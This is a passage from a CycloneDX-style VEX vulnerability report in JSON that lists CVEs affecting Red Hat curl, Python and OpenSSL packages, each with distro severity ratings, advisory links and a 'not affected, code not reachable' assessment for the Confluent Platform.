          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-15282",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        93
      ],
      "description": "User-controlled data URLs parsed by urllib.request.DataHandler allow injecting headers through newlines in the data URL mediatype.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-15282"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19064"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-15282"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19064.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19177"
        },
        {
          "url": "https://github.com/python/cpython/commit/05356b1cc153108aaf27f3b72ce438af4aa218c0"
        },
        {
          "url": "https://github.com/python/cpython/commit/34d76b00dabde81a793bd06dd8ecb057838c4b38"
        },
        {
          "url": "https://github.com/python/cpython/commit/3f396ca9d7bbe2a50ea6b8c9b27c0082884d9f80"
        },
        {
          "url": "https://github.com/python/cpython/commit/4ed11d3cd288e6b90196a15c5a825a45d318fe47"
        },
        {
          "url": "https://github.com/python/cpython/commit/a35ca3be5842505dab74dc0b90b89cde0405017a"
        },
        {
          "url": "https://github.com/python/cpython/commit/f25509e78e8be6ea73c811ac2b8c928c28841b9f"
        },
        {
          "url": "https://github.com/python/cpython/issues/143925"
        },
        {
          "url": "https://github.com/python/cpython/pull/143926"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-15282.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/X66HL7SISGJT33J53OHXMZT4DFLMHVKF/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15282"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-3"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-15282"
        }
      ],
      "published": "2026-01-20T22:15:50+00:00",
      "updated": "2026-06-17T08:37:31+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-15468",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: If an application using the SSL_CIPHER_find() function in\na QUIC protocol client or server receives an unknown cipher suite from\nthe peer, a NULL dereference occurs.\n\nImpact summary: A NULL pointer dereference leads to abnormal termination of\nthe running process causing Denial of Service.\n\nSome applications call SSL_CIPHER_find() from the client_hello_cb callback\non the cipher ID received from the peer. If this is done with an SSL object\nimplementing the QUIC protocol, NULL pointer dereference will happen if\nthe examined cipher ID is unknown or unsupported.\n\nAs it is not very common to call this function in applications using the QUIC \nprotocol and the worst outcome is Denial of Service, the issue was assessed\nas Low severity.\n\nThe vulnerable code was introduced in the 3.2 version with the addition\nof the QUIC protocol support.\n\nThe FIPS modules in 3.6, 3.5, 3.4 and 3.3 are not affected by this issue,\nas the QUIC implementation is outside the OpenSSL FIPS module boundary.\n\nOpenSSL 3.6, 3.5, 3.4 and 3.3 are vulnerable to this issue.\n\nOpenSSL 3.0, 1.1.1 and 1.0.2 are not affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-15468"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:1473"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-15468"
        },
        {
          "url": "https://bugzilla.redhat.com/2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/2430390"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430390"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-1473.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:1473"
        },
        {
          "url": "https://github.com/advisories/GHSA-rhx3-fg8p-f9m4"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/1f08e54bad32843044fe8a675948d65e3b4ece65"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7c88376731c589ee5b36116c5a6e32d5ae5f7ae2"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/b2539639400288a4580fe2d76247541b976bade4"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/d75b309879631d45b972396ce4e5102559c64ac7"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-15468.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50081.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15468"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260127.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-15468"
        }
      ],
      "published": "2026-01-27T16:16:14+00:00",
      "updated": "2026-06-17T08:37:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
